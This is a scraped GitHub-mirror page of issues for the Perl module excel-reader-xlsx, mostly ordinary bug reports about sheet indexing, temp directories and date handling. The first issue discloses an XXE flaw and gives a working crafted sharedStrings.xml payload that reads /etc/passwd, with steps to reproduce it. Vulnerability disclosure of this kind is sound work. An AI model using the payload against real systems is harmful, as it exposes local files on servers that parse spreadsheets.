Giter VIP home page Giter VIP logo

excel-reader-xlsx's People

Contributors

jmcnamara avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar  avatar  avatar  avatar

excel-reader-xlsx's Issues

XXE injection is possible via specially crafted excel file

The module is vulnerable to XXE injection that allows to read local files, make network requests etc.

How to reproduce the issue:

  1. Add XXE payload to xl/sharedStrings.xml like in the attached file
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE foo [ <!ELEMENT t ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="10" uniqueCount="10"><si><t>&xxe;</t></si><si><t>testA2</t></si><si><t>testA3</t></si><si><t>testA4</t></si><si><t>testA5</t></si><si><t>testB1</t></si><si><t>testB2</t></si><si><t>testB3</t></si><si><t>testB4</t></si><si><t>testB5</t></si></sst>
  1. Run example from README.md:
use strict;
use warnings;
use Excel::Reader::XLSX;

my $reader = Excel::Reader::XLSX->new();
my $workbook = $reader->read_file( 'test2.xlsx' );

if ( !defined $workbook ) {
    die $reader->error(), "\n";
}

for my $worksheet ( $workbook->worksheets() ) {

    my $sheetname = $worksheet->name();

    print "Sheet = $sheetname\n";

    while ( my $row = $worksheet->next_row() ) {

        while ( my $cell = $row->next_cell() ) {

            my $row   = $cell->row();
            my $col   = $cell->col();
            my $value = $cell->value();

            print "  Cell ($row, $col) = $value\n";
        }
    }
}

As a result you'll see the content of your local /etc/passwd file

test2.xlsx

Can't locate XML/LibXML/Reader.pm

This is the first time I use this zip file. And I have a problem with XML/LibXML/Reader.
Can you give me link to download it?
Thank you very much!

Sheet index issues

When users mess with the sheet tabs (remove sheets after creation - move the order of sheets after creation) it throws of the XLSX sheet index off in your reader. The following fix to Excel::Reader::XLSX::Workbook lines 123 to lines 137 fixes that.

Was

my $rel_id   = $node->getAttribute( 'r:id' );

# Use the package relationship data to convert the r:id to a filename.
my $filename = $self->{_rels}->{$rel_id}->{_target};

 # Store the properties to set up a Worksheet reader object.
push @{ $self->{_worksheet_properties} },
    {
        _name     => $name,
        _sheet_id => $sheet_id,
        _index    => $sheet_id - 1,
        _rel_id   => $rel_id,
        _filename => $filename,
    };

Could be

my $rel_id   = $node->getAttribute( 'r:id' );
   $rel_id   =~ /(\d+)/;
my $index    = $1 - 1;
# Use the package relationship data to convert the r:id to a filename.
my $filename = $self->{_rels}->{$rel_id}->{_target};

# Store the properties to set up a Worksheet reader object.
push @{ $self->{_worksheet_properties} },
    {
        _name     => $name,
        _sheet_id => $sheet_id,
        _index    => $index,
        _rel_id   => $rel_id,
        _filename => $filename,
    };

Temp directory not cleaned up

In XLSX.pm, $tempdir is an object, and when you do:

$tempdir .= '/' if $tempdir !~ m{/$};

it is no longer an object (just a string) and the tempdir object you just created gets destroyed and so the directory you just created gets cleaned up.
So when the extractTree() call later recreates the directory, it is just a string, and it does not get cleaned up. Need to make a plain string copy of the object:

my $tmp_dir = "$tempdir";
$tmp_dir .= '/' if $tmp_dir !` m{/$};

(...then use $tmp_dir as needed but save $tempdir in the excel object).

Of course, it would also be nice to optionally pass in a custom temp directory and custom CLEANUP option to File::Temp->newdir() (not both at the same time, but either/or at any one time).

Too many files open

I don't know if there's anything you can do about this, but in a spreadsheet with about 500 worksheets, I get: "IO Error too many files open". I know that each worksheet is in it's own file, but I don't know if the file handles are not getting closed as they get read, or if it's necessary to keep that many files open simultaneously, or if the bug is in some other library, etc. I have successfully run Archive::Zip ExtractTree on the file, and it all seems to get extracted ok. Will try to research further unless you beat me to it.

Getting total row count

I actually have two questions:

  1. When will this module go into CPAN, is there any current plan for an initial official release? (I've been using it pretty heavily for at least 6 months now, though just the basic features)

  2. Is there a recommended way to get a total count of rows in a worksheet other than actually iterating through the entire worksheet to count and then iterating again to start parsing values? I looked at possibly using some sort of scan method from XML::LibXML::Reader but nothing really looks appropriate.

And a compliment:

Great module, extremely useful.

Date types are not handled very elegantly

When I use the module date types are read as the Microsoft office raw format (The number of days since Jan 1st 1970, if I recall correctly). It would be really helpful if the module provided either the translated date (The DateTime::Format::Excel module is probably a good place to start for that) or a way of determining whether a cell is a date or not (a type method on the cell object or similar).

Required XML::LibXML version

The Makefile.PL requires version 1.89 of XML::LibXML. Just wanted to say that for perl version 5.8.8, I only have XML::LibXML version 1.84, and all tests for Excel::Reader::XLSX pass, so you can probably downgrade this version requirement.

Warnings during test

With perl 5.14.1:
t/regression/workbook/worksheet02.t ..........
Use of qw(...) as parentheses is deprecated at t/regression/workbook/worksheet02.t line 38.
Use of qw(...) as parentheses is deprecated at t/regression/workbook/worksheet02.t line 48.

Did this get undeprecated in a later version?

Looping Through a rows cells does not return empty cells.

When I loop through a row object's cells it does not return the empty cells which are in between the first populated cell and the last populated cell. This is unlike the call to row->values() which converts the empty cells to an empty string.

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.